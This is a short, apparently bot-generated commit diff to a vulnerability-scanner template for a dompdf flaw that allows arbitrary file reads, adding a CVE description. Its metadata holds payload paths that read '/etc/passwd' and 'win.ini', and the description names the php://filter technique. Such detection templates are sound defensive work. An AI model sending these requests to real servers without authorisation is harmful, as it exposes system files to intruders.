Auto Generated CVE annotations [Tue Sep 21 10:20:38 UTC 2021] 🤖
parent
005e5060b9
commit
5fa06f52e1
|
@ -9,6 +9,7 @@ info:
|
|||
metadata:
|
||||
win-payload: "/dompdf.php?input_file=C:/windows/win.ini"
|
||||
unix-payload: "/dompdf.php?input_file=/etc/passwd"
|
||||
description: "dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter."
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
Loading…
Reference in New Issue